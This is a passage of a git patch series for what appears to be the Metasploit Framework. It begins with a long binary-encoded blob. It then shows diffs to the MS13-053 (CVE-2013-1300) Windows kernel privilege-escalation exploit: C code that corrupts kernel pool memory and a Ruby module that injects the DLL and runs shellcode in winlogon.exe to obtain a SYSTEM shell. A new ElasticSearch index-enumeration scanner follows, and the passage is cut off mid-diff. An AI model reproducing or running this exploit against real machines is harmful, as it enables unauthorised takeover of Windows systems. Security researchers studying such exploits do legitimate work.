zReU;=-$$=l6`4Y;qgw;8MRu??m_WA9>Es$Nc17k8Z&HCUMpL`c5+C(QjZgCG*WH(S zhStKJyfnLWaD&6)kJ=e#n(TV5_HR&RX33d>U$DZn@|$f9MsKr>8i^D^ZVk~BReYs-n&INyLR z4P-Q9sBIdx&WYA2UwHJc6RnZH0YkM&G2l+1q4JHc6RjM}9x4alUy#14T!qD_2*RUx z2KGJAqK!7%NO!Z}_5J2mBWf)#fs?iW#b90KAweUm!&gZyWLQt+y=u6lIt% zLC0`jc-epcQ0YdprKpXIU594qYJIgi=0|VVpGL?}TX*vT&xnO_H*JjcMKtb?+88Ae zxiL;4d}E?O7>5f7F54|}E11D{z~|-5?}67<>WJdiR4OEkkWWdXd@)4z0^E~;&LPpS zb;`S>ZrKN7g6&EFdEy&;V{~7`>DjeBr=R}cuEL3Ab|EIf?vbdIuaEec6FXh5k7JiV zLGoq<)5%fX^AXJMH!HeH23@6Y>j{;LTlG}zRjJskQn5E&PsLu9ioKEwzM~L$dBiKe zZ<19K@!_C~_$&U4m+jRfejZ3rL~*Yk`S`<>1d4El#2#&=W=xc< zY?fsI`HG0Bh}d6J8D<~1?&c0#$!>L7n&kMCdK4tnpVT8E`HokT?|d_m*oCq_(EhxX zKKcDkB9W*^`;;((p5GUT@>_CNMO)AFg&Cuy)Ni@=Mc-vfEi|@#801CLNcL-Coq927 z5vmw8rYuI(M{z$xYxFMe=UDzb+~fyGvPPWGfIK*dxZHFT>4;%a@HNx%q~y!FlCn)t z${XiM${Tv@gmunJik^_KmyXuxy?n5OY!77~a~RC0$d?d};a88ShGmF&Ml`lXihP1m zBAsBI$R?N=5=xZeGXncw5H<*L{_DOGl!O$K642L0KoJcQP}oTX6z&S_TlSu;!20-Z zi|~wpAUAp-;j2Tc_xUm|ZDrN7bWjoK#eLkHnIhctF`qU=oA#ijfjbm1iCRVdesQg~Dv)>i{)2FT~ z5Tt%!)0d{%zkrU3Nv|F3tFie_+kxGVkX;w7mvLoST!mJv&DW~58qLdZoK~!r^WzJ% zRW;dlWxo8Hs`=j9S`2t3jJ4ZY4*jK%DrRD6<;w}(#kPV$$ z7nmUCFKKa?f?L30VAM`6?lQ0r91aG-%R$>NE$#|22NS`JHZAT-a3gpXxb|f&t`5{* z(c+c>iQt`}8$1op0;QKV7o4W0XeNFZZKyUxOVSdx64F?u6=^=LOsmuuU{Z}<)IQX; znjgKG)ad$3RAR2)DJGwab)WEFe+>WaJ^mYSc=53c-xjb}L;S5K%=x@8F%aJq(br(> z*D5fT&};knZ20T=PxvdoEha@Zgj3n$yQE*!l)q+j#K?~#ZJr(( zu@avWiFJ|A8GX}k_>+8qA7N3iCzZ3bd)Z<;I zhh3)Ksi#JT+Z&p}&lathU%q~L!Ygv7PCz~j zacQLCT>hM^{;_K2p8U=v7ez`c;5}9D!inedNn$H;O4N*SE65R5_F_{+JcNg(%%y!8 zLflI6Nooi2Ps&Q_1_@2filBM$h}5ZKpQtV2ZQ&-dlUlXB=M7bofmiEnvYfi_voMI|kzNUg|$)GHOJB$rfv zNS!HfROmIp66}igluK+RKcsFDxmm3H(Ce4ji+rAo&;Kj(JCW1~SEyJ^d5hFZ`&LG+ z=>;Y3244s-NQ)>nt#CpK|3+(Iq)c&%kxxl_J_+xY>E$7H^%&}+`RHo&_T|g9NN;`$ z2YorGq~7%LwjW=lUKM^)|GjT!;eR=$RYbUz@aowz)?1&7z2v|6D!CxstJ?m)wWn(T z7U;eu=`JKCi}Ak(Geh2cTkI_DMncadcc5$Y* zEX&|9;lbVz67_~-+FAD5#8b6?S0cAVw0vE+fd3+VaN+~~B}z%$7^W)kmH!gjB1me; zO3kB(F^+s4hf4f2o;+eSU-w1Ywi05PsLjAkxJI=a6SQmjB_iSdQ;>_Rd3td*+5Cbm#d8m(i6>8~+%5#4o^>_NHSNBo#IiVi++~(4w{$3yTQ{lblzw4ux z{xg2bC{h1}j>t$2IUD(Z2B0ZYKS4U0>j>D5@^4s`2V( zcvM)5d2xZSX#S!}{-T;9E|&L(+$yW;s;ctBvI=hv@#%5j$8cs*nQvlM%~_5o6qT3H z!_Qi6LU~oK_bgjUn~G1bh4>@p{lW+tp5=#bIR@&1w$Z;d|EkW9-h zn^#j*vt(wex6+8rG_TKJQ;7>QbArF7hO7yBP*pR?T*1RMk`z zNyZxSE?81Aud2Lker{RiqL~usEN@AXzucEqUY=D}Lm^bvlzH{IWLNqt3YOIRycM}s zc}xQJ>7dmV98D+=6I zDwQVgYji`x;62?P@A_+Wm8M-^RH;q$&eQUWYP8Ji8gPkrJz-w&FV`~t3&_`M?Z){& zZA#T*Ez3J!+#{DuPspUBaZ#eGRXmX@k%zUbsPmKIp-p(j{8vIhkj9Pt(8mF$R?O&;&~RYzGH`IUt9gwS17BW7;fG+UdEV z%omk{(sQT=rH!uxW55P*DA)v^2d)NX8{k?n4qOk)ywXPS0&p{UA-DyM2U|c6ooa0$ zhhDXIQ0AKsftP|Epv*S~L78vr0%g9b8>Ek+Y459frzlY7o#MbmFaf+0Oax`#X$&|5 zG=U>QJ2(o=0Ivpfz|mkncnvrU{3bXTycR44$AZ;h5?BXb2R48yU=x@Mt_JPkTF?Qm z2c-wL5lja+gBjo!FcWM6CxC5W7T69>1P_6ezz%RS7zD2eyTBX3ZcyrS?T8k4BM=2j zJs$_o024r|Zxg|r!7-q4xCy))w1Z(VfEx@4bHE6&5R3$+{TKkwML!TM2M2+5U=+9< z91I@hlibnZYVd&!1`LA3z~i6`j5&%wU;-FMg*FC^1a06T zFasP6=7K}OSzruU3=RXUK^M3b45PwZ2}Xiz!9m~#a4@(T90G0yW570W7o4_I9 z7O@9+i2X?7A@*R0*n`K!9_$wTF~p}6doUgx0w#iCV~LNLgLW|ov&7tle2O_ZTg<^y zF}ER~Vh%QlIk-~H?c|r}!40B!lV73-w~9W4{1QEQP%w*l3g!?`!Cc}gn2($uBmb8o zr{FL!5wugsjMr2hP878C%)|=3i1)3YI2Xnw@#2ou@a4!06F-IQ>mZO)prVjizn2)*i36`TL3-!K$ z^bJ;{e+*m)eiz&bO55}l_*<|A{5fbMKc#KkgFXPx#lJz|Vf505m7; zuElzCEzjeey{=a zYr$^x6=3AYT3jO-M>uJM=rzpdZWyr-NIF_XXfA z^bdi>U?EryejjYX{z7mm`c>c|{7nIy(BB2NVIL2!K|cd*M}HBx9{o&k6Sx-K0GC;6_2*UknD(&jLHpUjiOSe-ju*y4;}l2_M!2V!)q*3E*OIB)AUj;=M~j6Z%^~ zJMp{TIcDYzM|1Gj)p;49!-a2ME(f5X6y=x2jcx4#cQg?>A@2mC#F z1bhNK4gLVs2=_7|{%=~`55Yum4%mXZ6&#EHPH+tA$^h-??*pYzZU=MFH-KH}9bh5) zWndKg;ow~Kw}RzhB}k<7u}dBL+t9b8PX?ExUkZ*vp9ro-KMzbme>u1g{ammOy$#%m z{$a2M{1!MD^U>fT^kv`?unOz~BS7uA7WWYMOwtXR!152%Ofi;^2mIvLP@>omAevsc0yz3xkfja^(=YR z?1hG{awlsn^2mIaJTiYJPi4qondz2C)~FOJ_cA{&kIVwdBP-YP)Z&A}+e0W^Nqvh8 zh02}GV8~NOO62i}-jlJuJheUPQsI^BGZK_@D8413_{v(bJf)#=eG#*9@_0k>stEa8 zL{7-FDD{^gV_9@6CtH=sf{AGl*BU&weXe9)u=p_G>+G#9u@u) zKP4Z$dOWjr|Ao(z2z3VL!fT?I^a{U;pAt{uxg=anK`neI@ytUlyeI0L`Oih?3zfC- zqETMLk4d5}yh^&Ut#A zW!=>%7vXOSSJEy#E_2kvGs5Sh7QPZ*7q$2={4V)+c3Oo0jk24k$6tjj@?gY4WWrF3 zT=c3Hk4Zd5J`D2;y)2CQOF1faZJ&2VZY2Kl?tDGYlPF1%KPg8g3rd!ZwEAoa5Fjl@aCL+V}eS=wx= zbA`_&AC=4~_ey4zd8PiYAv2Pv`JpmXG0w-NFApghP;%Rs&nD<;RCTi|ZzU(HyvOVL z)weABx;N6FO?u=}>CD!7L9J=z=zJ<|jqtU|fl70xF1sqtD(_XAC+NIf8_IP_L*MXJ z{8So@u=Dj?GQ!T)OG<@ZpvOanof`^I@>_+W!k!e8P02Hr$ErRVABsl>?V2G0Mi^Oo znW`}I^pZEiP<4TXp~_u_A$vfKGF9=IrzRL}by(FBQI$SXJ7_J4zB&oX6|sVC03!isHZP_4q3{g(04k zxMb?(pxor@vTvka`qj!G#mUOe4f?v9a+4pDSMg^8a%F^-*{3|F>%6Dl9pA@&ejoFx zp|TWzRIQ=HEzoNerOpYJi@2FWtzpD1Uyr}BR+yuwOqCN(NW0YYvYX3@TM=n8)bpt0 z4Rx{J6H)Q>>b*v#E~7p(+$_|4H_CjG-h)xuiSNhAc4@G)!(npqkHqrx>aFfU#Nw4&ollWhxt0gS8W~by{tyw9x{2P5I+4<9} zmR_FfnpY>{NDFAV@%J&8onvAyZK&+b z6}9v~i_?dSh8w?=S3YK7GTwC#?4u z9`^Nq#{1_=(f^%U)LE%9eEz!lH4_|i7N_-h|MgPa>ncv`RV!6km@q=avU?hruekTy zP0jZOR<64LJFCC@!1vZX_|W&){@{l{TKD6JA6ftCV?WvO_!B?f_~g%izUddg{MF`P z|K_(({qE^!wmkdX^IL!a!nT&y?Jw?lY3HuC-7mkg=heNhweQ=1;NX9}{>Gs<-+KG- zAO84G$Gh*nf8L4BwRY|vf@8VPTDEXec|~Pa_3bsaKL6r7>XzJj%j`L~-ZuBE?Z36O{;s?K zyVL*Q9sa+Z|C!?_WMxmBlr#DI8*=le+?YRgT0!CT88c_ybhFC;ueSdmk^lcH`+art zz83rG^C7Z6Ie}RlnV*`@yv9iMJL*|)zt+T+{9OGsqF_qq6v4?;WKLdC*1*gort0Q? zHZ)r;}=Lbz2()ifqjZkKR&>A@)>0{K7Ubpp0}ck{lk?$UQw@U zdO8vl6Y*BNzN#{DS`|C>ujKrcuUu`*mtE6pYrZ(?_eez&4(aQ7;J}b=>V-;S=epRt| zc7@khR9jtMRpv`7sbQb|9aS}pW_#;=-kQpy^4Yaj{+jt-^ty}M+4C2BlPo5)HOXu> znP%6{FD);sAZxv4v!{8>y+yU&*=#wtTKd|ItFxz!t1gzg3VH4dk*?|Um!HfUC}o?k zme=~&C?(g2oDr2=MI>nGPh3j#(?@@>kNy3Zu@(;XwcpXlUd$7(>~DXz|My+3#Tj8e z)JJ``yHlfk-Lc22=N-8NtZ(@F*Z$-1;_Y8;f7HpD0jRHkebX!E&vWLzuYKQmw!7IY z1NF7vdRF{?;^}XHw*Lbs^tW$6>-}X}{q4_wKVnLMd->2=-}s~yDSI(vaMhEKXNS|h z;2-_vbi z9(^C`tBQ)fH5oQs zuGQV6;29ptyDgYSh#%_NA!e@WAKBSx47`<)Qev>URgP07wRTE1_GPxCG)<5X46 zgz}==THHU%X_gXo7D&$Zu*|VFyue#o96B?E{wXc1thTzyH@`Gw##`(AzlBM4C|u=L zc3q~H9#P1-xY}}>)X zaqz2xGgO=!^JZ%2NvcEV&{Si~F)VFC#N^s6?>zs41>Tx`vWr7%S_Ni3r_m;IuFqfN zHSDeo%dV70F2AabvwJn#7jmknk3L^Qk&{u`H8oZA4@%C?YyBkPzKA?dua%8o;`0_( z%`7YSPM~L@y)wX17FPAxYc1kKfv;ECXY2AL|n>UsE~{3*HlZVXQnpq%i&RmRz2VKqmx=v ztW~z_TnR#R13 zL9wUzs(MJl&aDSzJ(E zR;i~$8~o)|Xtxb0^ww0ARl>2MTxSk;Kw;0x(ppiI7n9W^2$OP}Pun1pkvSn>)9#fJZ_LgU z^>1}~$=Ca~ry_3j`>OpMvP3RawiB04k@Q!mSKh(#JuO8q@o8QqYj#~%z`0mWdnh8e z_w*xgy(D2MKZMsXc_2(bODg5ubB6S=lGe)Fs&cQy=A%A(vIKt-$(WZQm@%*nZ-If(bUR(^xIKvog2u4B) z&;V#CBx8-i&>$!ViVC5aiGBzqcF~YwC;rO2g0YbJ8wZKm`OpO+67wq|F{j(EyQ6B+ z^|Av*>|qT3ooONSf)Gk+ivO~cM#7dA0r95-N`$H**^fyjpvPa*A?_O>iSx1$-UCWn z8X>V?4v9bCg|2~Q&!y-eg(N;3APMiMkeELMNt*UTV*dst_6cN)li>_Z4ss;A_yo9>=(^e3aiz27JZy zuZR6V$cL|It6zL5cXUh{{*8hg6L`U%?z0>(>9D|NH+3V}ylAMkQVp7AK#h zpL@@ed#((X%M+_(PZt)C<+>o5It?YRDAgz$G?(|u;h z{nNOA?Xe?|4b%SgSnx49VbTBT@&B$z^*5%{z)yYa*0&P1+umCEmZiUAbjuDL`eVnZ z%!%G*ys4Z>-97Vl3#-Oy=B z+s7F-C<=;!IKUMb4-JRLKqg4s+rbPd2g-+LL&Z=vv=nN9mP4zd4Uo|uZAQHXYJu9I zcIXh)0R^FMC~80FnxL^z29ysKL*qMFM{)@fPzn_2Sz}L-zv-!oC zgBPA2hbJ*$4!rr#=ht^(fs1vuoaH Zrgp?{WeiQ`jFWY`#N=9PW!@sM( zcH=Kz`f*uC`<%~5{b|_!H(uJ=m~s09^_OKAd}rA`&t`0M z|Hl)rotb<^-Sz_+RXaOY9&Ok?>ACN1%-p(S(e%-dRVS-EmX6>0hx`Bd>5o6_yz6IE zCp`MW;`jG_a?N$imtCDTChn4-b^kK%{g-x}%If^-!M~mCeE0f0AABv_yJy#T&wJvR z>o0x(CliNyFNyIlyVt*XcTV1{@kf68J%=lK%WwWtkoVI+%}IM{jw|r+12>Je!OtG-{@dtnkG0MDLqlcm?jL>yl^oeVpDNJ7W2y z%O-7l>8Bs1XFTzAS^2L9{66*G&U9 z(;msX>6y5(qb46oO0nHo@XNi6Mt$d|$PF!j++P1#aOdR@|GDYrncsD9%Wu3YVag5O zd7n3a=T`&Q)SrJO>5q@>-QO1ZhbIo5YqZ=Thu%Z7)S#Jq)KV1xe!g}Na91{Np@#mi zgz4=p+4?1Oxd%qpl;>uIY4vAUW|+Iv>nh3<7jsJ-)39ly&Erg?6TLEf&NXalqo)^6 zOtOzoto1QpTU1_E=}jBG#9KQ$-7|EEn>7Y*$|_%yhzFImX`{JE&dJ&nx9Qa;Rg}%I zsj96i@g>c#s&E$7R*YM09-YWMe_4sQ);FVXXn2*F==Rn4YxV2MLcU$~PkggprN76U zwch!Dre2qX^qACmZ|4#+pSL)_rfe}2i3_~7J(hi~v+HIPE-kQ;g{<6&Za#MHO=#rxHTJPw@>w5fgU-#9axUcIMC--$diQ{$mbw<9S>0gNF z*3s`8Nx99mt+PFE+iyE+``8wdd};F4$`R- zl&4Z&NjZ@6r39nL>GGhJ1#Bd$)@ z7p@ey+dbZ$8h=Pq+syYFz{~Seq^mq?n?ef%Jh^uDNm%dq#RE< zl`4z)I+J)==oS}Z?^x?zR~`+y~}>WKF;BE-0Ap%W3S_=W1Q3GbU9Z$ z+njGZ$GT>_mbxBu{l>M+wa@j2>kqE?U6b6o?!#%FX;*p1k>D zC$-n4+tV}Cr=-`XuSkC={pIv7NjCz&2i}M@#gg)?O(`aiDa%w~nq!)8sxd7!-D6r~ zdf2qVw9WJyInZJ1HbtAyH(z4D+&tPm)@(65&FSWBbDnvcd6s#u*=t^8t~J-0?=s(O z4w%1d{(<>n^9J)K^RLa%n75gCm|r&UH@{*2gZWS956xZXZt^d}5^agITx_}AGQx6= z#cWBjxGY(g$>iot%WTU$%R)<)#c!#%++%67tR`oFWci6@qve;Dr!CK0S}nURdo2eo zhb`|~{%rZH<+$aPCEPm5I@EfRb(l5LI>wr0wOU=)4C_Se6l(#cQDiN#F0%TpORRTW zzfIZv$oiypv-S7Zoz_mPW*crxvn{oK*S6923tOA*Rixy+Ho`|UFw-*-Ib*yt#6E^^j8 ze+1wE&NpR4x}AQdpGR^I6U8Tv&Zkb+w+lUbozDa8R@?CZ>4`X{YUAa zq<@+&9l{+Hsb(5vy23QhWH)8Q#kZM$1LvMGRax$}ykI#%UVUh}$hyw@lJy9Tj*Keu1$FgXew#g2uJ#g2O& zD;+-~g}-rZLArN3_Bi%C-g0y}K5%^GIO+JpG0++7ywd4#raN<-Q=GG$^PNvPUvR$R zobLL$%j;h2&P{tDZ6oQKKuVT*R;K?p{nhlh(vPP9P53cirD1?6-gKF1tjS3l3Qf0~ zmYaTO+HQKq^jFhxvq+r9Qf66(lpV0VV;O0kL~35K{>3`e)?js%l;Vhw#mNP{uFiBC`X24 zk|WoV?S{ab}USTxY)XIoB2LN8ImZZ_O_u0Y}ZBnTJ}gfZy}saUUhK*5Xci zH02j5qf*mTbEshhsSl(+Oa1yv>YJ(i?C($$gi!(yIv#dB;b?KZLoB{Sjw$WTeravnYKFHR@+Y79$Sa)nC;Hw%Tt^w%TrdTJd^TjN=Hg~>fqGr zsb#6ZNPRjr1Ah0~&vRty-0+;^RY#b}e%~==zasy(<^aKAiR* z{M(uKaoXS0KGW;z!JhLx@ty=~>#ICtJYzi;Pl{)f=LJtkdQkGPfqn(B+I*E|oMo$J zhozm8USz$;`mEJto0fcYa(L>R)b*+3>?!u~_Nn$i*pE|JKJBo9XAt;VIcEXHr}2ZAey1dSm*})1Q?v*ULEy&Tg3-so#HM z{<(Rx`6=@j^SkCjmQj|m78CWn-Qu=nP($Td9-z$DS=L)NScXvFn5?N*H#JR`)ocBZ zwbj~Y-D7RH9<&~^9;WU;VjX9*+3YsAEyMP7a*2JA>m}D8U4L<%=bq^PiCf#O*5BSq zx!7@~!|a$(jy~WZA}wky%x1Qm-R2B)E^SXCwdrQ_5%V$gar0?&q$S1@Zy9bGN$hOI zEX$H>DWu*krX})OmRgouR$A6r+S2!=x2GRW*Vy5OH zC3bFGmMxcBV79H;R&MiA6E3%{w5_4fu)(&;_7q&P1Fkq|J8U}wXB@YkwnZk#B*!NY zPac^(HrbZ!PR>fsO)jK2QJh?!>`PvnygYej@|xsz$s3Y4B|nwCHF-z!p5%kchm(&a zA4@)-d^$NYB_<_4Wq8U+>KR*#J0&Y6H>EITc1m$dd5SM(DSWpwWlhSulnp7H=#Oko z*^#m*PmQI zUFrsEfT!rK>`2{{dNB2H>XFoAsmD`Kr$*Xi?D6*D_L26nb{lm<7WF})eYU;WUT*i< zm)e)xSJJ0hXWu~G@RWV4eTRLI{h4tI|4mXmJOPw*B zTC&{Xb1Zc%rySQf);TsfHqj5->exX|d62r~2=&Nu$7$px#u@J%?i}eHOUv%2R>^f1 zI%hkJo#jrSbE$K=bER{QbDeX8bCdHa=T>@8dz=TIhn+{9$DGHV?B;Vtxws4tSsUXr zx$LeCSB@*+HOn=ZTA7NJIWpB zPH-o>$GA;yyE}uvSiXCfd#<~bo>-l`!QJFuO?|!Iz0tkdy~W+)ZgaQ054k(sK_t4{ zt))e!#ib?CR*gwBrPpdGin>|}R zEuJ<{yXTOn!xQv$dAdDXdQ^HG{kTN>aVGjU8T94y(`Tj6O)pKaPOnREpvGIBzBYY* z`o{Fl>08oU(%X=OL+KsVFkR{0=~@T%3u303qD*n71o}T?*eq-}WtehI`KDR)|4L2O zraDuDsmZk3w3garBQ?nuYLPZmyWSfLn!4x_Y33+%oH@aqXdYuWA*&hY93)lxL#5_w zdP5E7Ci80ZTJw7IMr3!3xy9UOZZ{t?cbJ2EFG#aQ(FaPfXkGNviB7kBEcua;ZX->z zNXK$gu!*?q^&%r+6K*1j^B8(+ImEGvc(s{=rsJkK!p|qn)r8Yd9noc$nece}cU|<3 zx-F+Inl;iIWsR}MS>vr)sl6@WZ2MgJz7)={hWG2>{s#EJ2?8)*}Z-E4c+} zXh9y@kcf6<;t*2Nfm{TUj4mWYb3{6#kd8RyBLN9XL`KFSB_`y=j-+HDD>9WW4u=;< g!i{6$M;rW@1xMz>lZ9~QY(@;F@S_y?|E}l%0J?w*#sB~S literal 0 HcmV?d00001 diff --git a/external/source/exploits/cve-2013-1300/cve-2013-1300.sln b/external/source/exploits/cve-2013-1300/cve-2013-1300.sln index 87426cc08c..c1eb1c9cdc 100755 --- a/external/source/exploits/cve-2013-1300/cve-2013-1300.sln +++ b/external/source/exploits/cve-2013-1300/cve-2013-1300.sln @@ -1,7 +1,9 @@  -Microsoft Visual Studio Solution File, Format Version 11.00 -# Visual Studio 2010 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve-2013-1300", "cve-2013-1300\cve-2013-1300.vcxproj", "{C093C490-61BF-433E-AEB4-80753B20DEC7}" +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.21005.1 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "schlamperei", "schlamperei\schlamperei.vcxproj", "{C093C490-61BF-433E-AEB4-80753B20DEC7}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution diff --git a/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c old mode 100644 new mode 100755 similarity index 91% rename from external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp rename to external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c index f87ad889ae..9b08be0379 --- a/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp +++ b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.c @@ -1,10 +1,9 @@ -/* dllmain.cpp.cpp - * Exploit for CVE-2013-1300 aka ms13-053 - * Tested on Windows 7 32-bit - * - * used in pwn2own 2013 to break out of chrome's sandbox - * - * found and exploited by nils and jon of @mwrlabs +/*! + * @file dllmain.cpp + * @brief Exploit for CVE-2013-1300 aka ms13-053 + * @detail Tested on Windows 7 32-bit. + * Used in pwn2own 2013 to break out of chrome's sandbox. + * Found and exploited by nils and jon of @mwrlabs. */ #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR @@ -27,6 +26,8 @@ typedef NTSTATUS *PNTSTATUS; #define TABLE_BASE 0xff910000 +#define EXPLOIT_MSG 0xd + // global variables FTW HWND gHwnd = 0x0; unsigned int gEPROCESS = 0x0; @@ -132,7 +133,7 @@ BOOL AllocFakeEProcess(DWORD address) { addr += 0x10000; } - if(res!=0) return false; + if(res!=0) return FALSE; memset((void*)addr, 0xab, 0x4000); UINT *eprocess = (UINT*)addr+o; UINT *before = (UINT*)addr; @@ -152,11 +153,11 @@ BOOL AllocFakeEProcess(DWORD address) { //for(x=0; x<100; x++) second[x] = (0xbeef<<16) + (0xbb00 | x); //second[0x20] = 0x2; //second[0x30] = 0x1; - return true; + return TRUE; } DWORD wndproc(HWND hwnd, UINT msg, WPARAM wparam, LPARAM lparam) { - if(msg == 0xd) { + if(msg == EXPLOIT_MSG) { // triggering the exploit through WM_GETTEXT // printf("[-] WM_GETTEXT message\n"); unsigned char payload[] = "ABCDE "; @@ -257,7 +258,7 @@ int Schlamperei(LPVOID shellcode) // so we will copy in 8*2 bytes = 16 bytes to corrupt the pool pointer unsigned char *buf = (unsigned char *)malloc(16); for(int i=0; i<0x40; i++) { - NtUserMessageCall(gHwnd, 0xd, 0x8, (LPARAM)buf, 0x0, 0x2b3, 0x10); + NtUserMessageCall(gHwnd, EXPLOIT_MSG, 0x8, (LPARAM)buf, 0x0, 0x2b3, 0x10); } SendMessage(wnd, 0x401, addressofwnd, 0x0); @@ -277,7 +278,6 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) { } break; case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; Schlamperei(lpReserved); break; case DLL_PROCESS_DETACH: diff --git a/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.vcxproj similarity index 80% rename from external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj rename to external/source/exploits/cve-2013-1300/schlamperei/schlamperei.vcxproj index 93f23165d9..2a78c73931 100755 --- a/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj +++ b/external/source/exploits/cve-2013-1300/schlamperei/schlamperei.vcxproj @@ -1,5 +1,5 @@ - - + + Debug @@ -13,19 +13,21 @@ {C093C490-61BF-433E-AEB4-80753B20DEC7} Win32Proj - Schlamperei_DLL + schlamperei DynamicLibrary true Unicode + v120 DynamicLibrary false true Unicode + v120 @@ -40,10 +42,16 @@ ../../../ReflectiveDLLInjection/common;$(IncludePath) false + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ + $(ProjectName).$(PlatformShortName) ../../../ReflectiveDLLInjection/common;$(IncludePath) false + $(Configuration)\$(Platform)\ + $(Configuration)\$(Platform)\ + $(ProjectName).$(PlatformShortName) @@ -73,9 +81,16 @@ true true + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +IF EXIST "..\..\..\..\..\data\exploits\cve-2013-1300\" GOTO COPY + mkdir "..\..\..\..\..\data\exploits\cve-2013-1300\" +:COPY +copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\cve-2013-1300\" + - + false NotUsing false diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index cc072c3a6c..1b8916b7b6 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Local The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. - NOTE: when you exit the meterpreter session, winlogon.exe is lickely to crash. + NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash. }, 'License' => MSF_LICENSE, 'Author' => @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") - library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "cve-2013-1300.dll") + library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.x86.dll") library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") @@ -120,16 +120,17 @@ class Metasploit3 < Msf::Exploit::Local thread = process.thread.create(exploit_mem + offset) client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000) - client.sys.process.each_process do |p| if p['name'] == "winlogon.exe" winlogon_pid = p['pid'] print_status("Found winlogon.exe with PID #{winlogon_pid}") - if execute_shellcode(payload.encoded, nil, winlogon_pid) - print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell") - else - print_error("Failed to start payload thread") + + if execute_shellcode(payload.encoded, nil, winlogon_pid) + print_good("Everything seems to have worked, cross your fingers and wait for a SYSTEM shell") + else + print_error("Failed to start payload thread") end + break end end From b032f2c2700f02ec1d7e1e4c9c49ce697118f2d9 Mon Sep 17 00:00:00 2001 From: Silas Cutler Date: Mon, 17 Mar 2014 13:31:24 -0400 Subject: [PATCH 063/853] Added Elastic Search Enum --- .../scanner/elasticsearch/es_enum.rb | 73 +++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 modules/auxiliary/scanner/elasticsearch/es_enum.rb diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb new file mode 100644 index 0000000000..ed41a17cc2 --- /dev/null +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -0,0 +1,73 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' + + +class Metasploit3 < Msf::Auxiliary + + # Exploit mixins should be called first + include Msf::Exploit::Remote::HttpClient + # Scanner mixin should be near last + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'ElasticSearch Enum Utility', + 'Description' => 'Send a request to enumerate ElasticSearch indices', + 'Author' => ['Silas Cutler MSF_LICENSE + ) + register_options( + [ + Opt::RPORT(9200) + ] + ) + + end + + def run_host(target_host) + + begin + res = send_request_raw({ + 'uri' => '/_aliases', + 'method' => 'GET', + 'version' => '1.0', + }, 10) + + if res.nil? + print_error("No response for #{target_host}") + return nil + end + + begin + temp = JSON.parse(res.body) + rescue JSON::ParserError + print_error("Unable to parse JSON") + return + end + + + if (res.code == 200) + temp.each do |index| + print_good("Index : " + index[0]) + end + end + + if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 + path = store_loot("couchdb.enum.file", "text/plain", rhost, res.body, "CouchDB Enum Results") + print_status("Results saved to #{path}") + else + print_error("Failed to save the result") + end + + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + end + end +end From 975c2adbadf5f4c99d2d23cc4b9982cd107c6550 Mon Sep 17 00:00:00 2001 From: Silas Cutler Date: Mon, 17 Mar 2014 13:34:45 -0400 Subject: [PATCH 064/853] Fixed spaces issues --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index ed41a17cc2..a67961323d 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary 'License' => MSF_LICENSE ) register_options( - [ + [ Opt::RPORT(9200) ] ) @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Auxiliary if (res.code == 